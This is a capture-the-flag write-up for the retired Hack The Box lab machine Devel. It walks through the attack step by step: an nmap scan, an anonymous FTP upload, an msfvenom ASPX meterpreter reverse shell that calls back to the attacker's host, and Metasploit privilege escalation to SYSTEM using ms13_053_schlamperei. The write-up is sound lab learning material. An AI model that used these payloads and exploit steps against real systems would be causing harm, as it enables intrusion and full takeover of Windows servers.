HTB: Devel – Writeup

Details

This machine is Devel on Hack The Box, it is a retired machine on IP 10.10.10.5

Recon Phase

First step is to identify some services

root@kali:~# nmap -T4 -sV 10.10.10.5
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.42 seconds

So I tried another scan type

root@kali:~# nmap -T4 -Pn 10.10.10.5
Host is up (0.034s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 4.92 seconds

Shell Hunting

Next I wanted to get myself a shell, so I look at the webserver at http://10.10.10.5/

Screenshot 1

And the try the ftp server

root@kali:~# ftp 10.10.10.5
220 Microsoft FTP Service
Name (10.10.10.5:root):

I tried "anonymous"

331 Anonymous access allowed, send identity (e-mail name) as password.
Password:

And then just hit enter

230 User logged in.
Remote system type is Windows_NT.
ftp>

So I looked around

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
02-13-19  06:33AM                 2840 nadav.aspx
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

Digging yielded nothing so I tested if anonymous could upload

root@kali:~# touch test.htm
ftp> put test.htm
local: test.htm remote: test.htm
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.

It can, so I used msfvenom to create a reverse shell with aspx

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.10.14.11 LPORT=4444 -o revsh.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2783 bytes
Saved as: revsh.aspx

And loaded it onto the system

ftp> put revsh.aspx
local: revsh.aspx remote: revsh.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2819 bytes sent in 0.00 secs (34.0305 MB/s)

Then setup a listener

msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 10.10.14.11
LHOST => 10.10.14.11
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.11:4444

I then triggered it to run by going to http://10.10.10.5/revsh.aspx

[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.11:4444 -> 10.10.10.5:49163) at 2019-02-10 01:45:47 +0000
meterpreter >

This gave me a shell

System Time

meterpreter > getuid
Server username: IIS APPPOOL\Web
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

So I wanted to use an exploit suggester

meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) >
msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 28 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

So I picked an exploit and ran it

msf exploit(windows/local/ms15_051_client_copy_image) > use exploit/windows/local/ms13_053_schlamperei
msf exploit(windows/local/ms13_053_schlamperei) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ms13_053_schlamperei) > set LHOST 10.10.14.11
LHOST => 10.10.14.11
msf exploit(windows/local/ms13_053_schlamperei) > set LPORT 8888
LPORT => 8888
msf exploit(windows/local/ms13_053_schlamperei) > exploit
[*] Started reverse TCP handler on 10.10.14.11:8888
[*] Launching notepad to host the exploit...
[+] Process 3228 launched.
[*] Reflectively injecting the exploit DLL into 3228...
[*] Injecting exploit into 3228...
[*] Found winlogon.exe with PID 444
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.11:8888 -> 10.10.10.5:49180) at 2019-02-10 02:06:16 +0000
meterpreter >

This gave me a new shell

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

It was a system shell, time to grab the flags

meterpreter > dir 'C:\Users'
Listing: C:\Users
=================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-17 23:16:53 +0000  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 05:53:55 +0100  All Users
40777/rwxrwxrwx   8192  dir   2017-03-17 23:06:26 +0000  Classic .NET AppPool
40555/r-xr-xr-x   8192  dir   2009-07-14 08:14:28 +0100  Default
40777/rwxrwxrwx   0     dir   2009-07-14 05:53:55 +0100  Default User
40555/r-xr-xr-x   4096  dir   2009-07-14 08:20:18 +0100  Public
40777/rwxrwxrwx   8192  dir   2017-03-17 14:17:52 +0000  babis
100666/rw-rw-rw-  174   fil   2009-07-14 05:41:57 +0100  desktop.ini
meterpreter > cd 'C:\Users\babis\Desktop'
meterpreter > dir
Listing: C:\Users\babis\Desktop
===============================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-17 14:17:51 +0000  desktop.ini
100444/r--r--r--  32    fil   2017-03-17 23:18:11 +0000  user.txt.txt
meterpreter > cat user.txt.txt
[REDACTED]
meterpreter > cd '..\..\Administrator\Desktop'
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-17 23:16:53 +0000  desktop.ini
100444/r--r--r--  32    fil   2017-03-17 23:17:32 +0000  root.txt.txt
meterpreter > cat root.txt.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.